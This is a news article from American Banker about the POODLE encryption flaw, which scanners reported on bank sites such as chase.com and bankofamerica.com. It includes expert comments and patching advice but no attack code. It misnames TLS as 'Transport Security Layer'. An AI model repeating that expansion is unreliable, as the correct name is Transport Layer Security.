Several financial industry websites, including those run by JPMorgan Chase and Bank of America, are susceptible to a relatively new type of cyber attack that could be used to steal data from online banking users.
The attack goes by the non-threatening name Poodle, an acronym for Padding Oracle On Downgraded Legacy Encryption, but it could have serious repercussions. Those who use the hack can potentially intercept communications between a web server and website visitors — robbing any sensitive data shared in those sessions, such as a customer’s name and password.
Although there is a relatively easy fix available, many banks are only just becoming aware of the threat from Poodle.
“The banks I talk to are concerned about this,” said Avivah Litan, vice president at Gartner. “They are making the necessary changes so they avoid the vulnerability. It’s just another big thing bank security departments have to worry about.”
As of Monday morning, many prominent sites remain vulnerable, including bankofamerica.com, chase.com and even federalreserve.gov, according to a scanning tool offered by Qualys, a provider of cloud security and compliance software. (Full disclosure: the scanning tool also says http://www.americanbanker.com is vulnerable to the Poodle attack.)
Bank of America and JPMorgan Chase did not immediately respond to a request for comment, but a spokesman for the Fed emphasized that its website is not subject to a Poodle attack because it doesn’t collect sensitive information.
“The Federal Reserve Board’s public website is used to disseminate public information only,” a Fed spokesperson said. “Because private or sensitive PII data are not exchanged, web sessions are not encrypted. As a result, the Board’s website is SSL3 disabled and therefore not subject to Poodle vulnerability.”
To be sure, no cases of Poodle-enabled crime have been reported yet. But hackers are likely to try to take advantage.
“Statistics say 25% of all flaws that are discovered are getting used by attackers,” said Wolfgang Kandek, the chief technology officer of Qualys. “We just don’t know which 25% — it’s difficult to predict.”
The attack exploits a security hole in an aging encryption protocol called Secure Sockets Layer (SSL) as well as older versions of SSL’s more modern replacement, Transport Security Layer (TLS). Google researchers discovered the issue in SSL in October and in TLS in mid-December.
But it comes at a time in which banks and other companies are already facing a staggering series of security vulnerabilities and data breaches. Heartbleed, another vulnerability in website encryption technology (albeit with a catchy name and cool logo) came out in April. The Bash bug, a critical security vulnerability affecting many Linux, Unix and Mac computers, came to light in September. Meanwhile JPMorgan confirmed earlier this year a massive data breach, in which card records for 76 million households and seven million small businesses were compromised.
Poodle Is High Maintenance
Unlike Heartbleed — for which readily accessible malware toolkits cropped up within a week of its discovery — Poodle is harder to execute. It’s not going to be the first thing cybercriminals reach for when they want to attack a bank.
To exploit Poodle, hackers “have to do an attack from scratch and write all their routines and they’re kind of lazy,” Litan said. “If you’re a clever programmer, you can do it and maybe someone’s trying.”
But she said that hackers have many other options, such as malicious code that’s already been written to do things like eavesdrop on users’ keystrokes, take over browser sessions, and escalate privileges.
Still, Poodle poses a threat, observers agreed.
“The broken encryption that Poodle attacks leaks data, but it leaks so little of it that a lot of work has to be done to get a bit of data,” said Don Jackson, who is director of threat intelligence at PhishLabs, a provider of cybercrime protection and intelligence services. “If you do it enough and for long enough, you could capture a cookie and use it to connect to a service like online banking, authenticating suddenly as a user, and have access to the bank account.”
Blocking Poodle
The good news for banks is that Poodle attacks are fairly easy to block.
The first step for a company is to check its websites to see if they’re vulnerable. There are a several free scanners that check for the presence of flawed encryption that allows it, such as https://www.ssllabs.com/ssltest/.
Where a vulnerability exists, a company needs to apply patches to its website software so that it supports only recent versions of the newer TLS encryption protocol.
The tricky part is timing.
“The problems arise around testing and availability — when do you do this?” Kandek said. “You have to take the system offline for a while and update it, so you have to negotiate that with other areas, as most companies would like to have 24/7 availability. That’s why people are sometimes reluctant to perform these patches.”
On the other hand, most companies have redundancy and failover on critical servers, so IT can test and run the new software on a backup machine before taking it live.
By Penny Crosman from American Banker
View Entire Article
Tech Bank 